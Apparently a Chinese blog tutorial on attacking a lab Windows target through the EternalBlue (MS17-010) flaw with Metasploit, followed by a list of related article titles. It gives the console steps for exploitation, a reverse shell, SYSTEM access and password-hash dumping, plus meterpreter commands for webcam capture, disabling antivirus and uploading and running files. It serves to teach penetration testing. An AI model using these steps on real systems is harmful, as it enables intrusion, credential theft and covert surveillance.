1、通过命令“msfconsole”启动msf,或者通过菜单启动msf

msf模块说明:

exploits:攻击模块,利用发现的安全漏洞或配置弱点对远程目标系统进行攻击,从而获得对远程目标系统访问权限 的代码组件。

auxiliary:辅助模块,为渗透测试信息搜集提供了大量的辅助模块支持,如负责扫描、收集、嗅探、指纹识别、口令猜测等。

payloads:攻击载荷模块,攻击成功后促使靶机运行的一段植入代码。

post:后渗透攻击模块,收集更多信息或进一步访问被利用的目标系统。

encoders:编码模块,将攻击载荷进行编码,来绕过防护软件拦截。

2、通过"show exploits"命令,可以查看当前2099个攻击模块,如下部份截图。

3、模块太多,通过关键字搜索“永恒之蓝”漏洞编号“ms17”进行搜索可以看到前序号为6的攻击模块就是要用的,所以输入命令“use 6”,代表当前使用这个模块进行攻击。

4、通过输入option命令显示当前攻击利用模块所需填入的参数,required是必填的,如下图除了RHOSTS需要填入攻击主机IP外,其它都有默认值,所以这里只需要设置rhost即可。

设置好后的参数如下:

5、验证靶机445端口是否开启,否则就不能利用,从下图可以看到445端口是open状态,即可以利用。

6、通过运行“run”命令,扫描靶机,可以看到第一行己经识别出来了有可能能利用ms17漏洞,而且还识别出来了靶机系统的信息。

7、上面己经进行了扫描也确定了可以利用ms17漏洞进行攻击,哪么接下来就得利用msf提供的攻击载荷模块,如下进行search ms17后从序号7~10都是相关的攻击载荷模块,这里永恒之蓝要用到的则是序号为8的模块。

8、通过show payloads显示所有载荷模块,这里需要用到的是tcp反向连接的方式。所以 use 15,表示要使用序号为15的载荷模块。

9、设置payload攻击的目标地址

10、通过 "run" 进行攻击,从如下图可以看出己经攻击成功了。

通过getuid说明己经拿到了system权限

通过shell命令,可以直接连接靶机的dos命令窗口

11、攻击成功后可以把当前进程放入后台,这样就可以再重新攻击别的机器。

通过hashdump获取当前系统的密码

12、获得了meterpreter后我们还能做些其它操作

webcam_list:查看摄像头

webcam_snap:通过摄像头拍照

webcam_stream:通过摄像头开启视频

screenshost:获取屏幕截图

screenshare:实时监控桌面

shutdown:关闭目标机器

run killav:关闭杀毒软件

run getgui-e 启用远程桌面

download C:\\1.txt 1.txt下载文件

upload /var/www/shell.exe  D:\\shell.exe上传文件

execute -f shell.exe 执行文件

13、进程迁移,在进程少稳定的情况下,可以把当前会话进程迁移到其它进程上去。

kali通过msf利用永恒之蓝攻击服务器相关推荐

  1. MS17-010漏洞攻击与防御(利用永恒之蓝攻击Win7系统)

    任务1 利用永恒之蓝攻击Win7系统 在Kali终端中输入命令"msfconsole ",启动Metasploit:输入命令"use auxiliary/scanner/ ...

  2. MSF利用永恒之蓝渗透win2003

    1.信息收集 (1)使用Nmap工具进行扫描,发现开放了445端口,尝试利用ms17_010漏洞. (2)运行metasploit. 2.漏洞探测 (1)查看漏洞模块. (2)使用Auxiliary ...

  3. 利用永恒之蓝入侵服务器复制文件,msf利用永恒之蓝进行漏洞攻击

    1. 永恒之蓝Eternalblue 攻击 Eternalblue 通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞 恶意代码会扫描开放445文件共享端口的Windows机器, ...

  4. 利用永恒之蓝入侵服务器复制文件,永恒之蓝漏洞利用复现(示例代码)

    一.环境搭建: IP地址 系统信息 备注 角色 192.168.0.244 win7旗舰版(未安装MS17-010补丁版本) 需开启445端口及SMB协议 靶机 192.168.0.105 win7旗 ...

  5. 经典利用永恒之蓝漏洞对Windows操作系统进行攻击

    利用永恒之蓝对Windows进行攻击 环境搭建:kali.Windows server 2008R2.Windows 7,其中Windows server 2008R2\WIN7为靶机. 首先简单介绍 ...

  6. 利用永恒之蓝漏洞+修复方法(MS17-010)

    文章目录 利用永恒之蓝漏洞+修复方法(MS17-010) 1.环境 2.信息收集 3.使用MSF的永恒之蓝模块 4.使用ms17_010模块,对靶机进行扫描 5.1使用ms17_010模块,对靶机进行 ...

  7. 利用永恒之蓝渗透WIN7

    实验名称:利用永恒之蓝渗透win7 实验人:xx 实验日期:2021.9.24 实验目的:通过已知漏洞攻击目标服务器并拿到shell 实验环境: kali:172.16.12.30 win7靶机:17 ...

  8. 模拟“永恒之蓝”攻击,实现系统提权

    实验目的: 使用Kali Linux平台的"metasploit framework"工具,针对Windows7操作系统模拟"永恒之蓝"攻击,实现系统提权. 实 ...

  9. python调用msfconsole全自动永恒之蓝攻击_使用Metasploit复现永恒之蓝攻击

    1.Metaspolit介绍 Metasploit是一个免费的.可下载的框架,通过它可以很容易地获取.开发并对计算机软件漏洞实施攻击.它本身附带数百个已知软件漏洞的专业级漏洞攻击工具,并保持着频繁更新 ...

  10. 蠕虫病毒利用永恒之蓝漏洞传播 单位局域网受威胁最大

    一. 概述 日前,火绒安全团队通过"火绒威胁情报系统"发现蠕虫病毒"Worm/Sharp"正在全网传播,其中在政府.企业.学校.医院等单位的局域网具有非常强的传 ...

最新文章

  1. Linux 环境变量配置
  2. 1024程序员节 继续薅羊毛
  3. 熟练掌握python是什么概念-Quant面试时说:熟练掌握Python,请三思,不然凉凉~
  4. Flume fan out(扇出)详解
  5. WEB前端 实现图片懒加载 echo.js
  6. 利用python爬虫(案例6+part14)--如何爬取科研数据
  7. matlab做比例积分微分控制,收放卷卷径计算+闭环摆杆控制参数自适应PID控制算法(变比例变积分变微分)介绍...
  8. php 设置excel格式,php 操作excel文件的方法小结
  9. Jenkins --SVN
  10. *【牛客 1 - A】矩阵(字符串hash)
  11. Mac支持NTFS两款软件
  12. 李洪强经典面试题45
  13. 25条实用简洁的Python代码
  14. Java实现文件下载Zip压缩
  15. 基于团队的持续优化之道
  16. 遥感(4):卫星遥感图像处理
  17. env下pkgs --update没有反应直接退出的问题解决方法
  18. 【HCIE TAC】第二题
  19. 微信mars学习笔记
  20. 金山办公2020校招C++开发工程师笔试题(一)

热门文章

  1. android 点击对话框按钮 不关闭按钮,Android在单击PositiveButton后不要关闭AlertDialog...
  2. win7 x64部署和串口调试虚拟驱动toaster
  3. ORACLE用自定义函数实现EXCEL中的NORMSINV与NORMSDIST函数功能
  4. 我认知的 DevOps 核心价值
  5. SQLite 基本语法(二)
  6. 瀑布流插件WookMark
  7. ReactNative第三方组件库
  8. OpenAI Gym 关于CartPole的模拟退火解法
  9. 小黄鸡 php,小黄鸡simsimi接口
  10. 在Win7下去掉快捷方式箭头的简便手动操作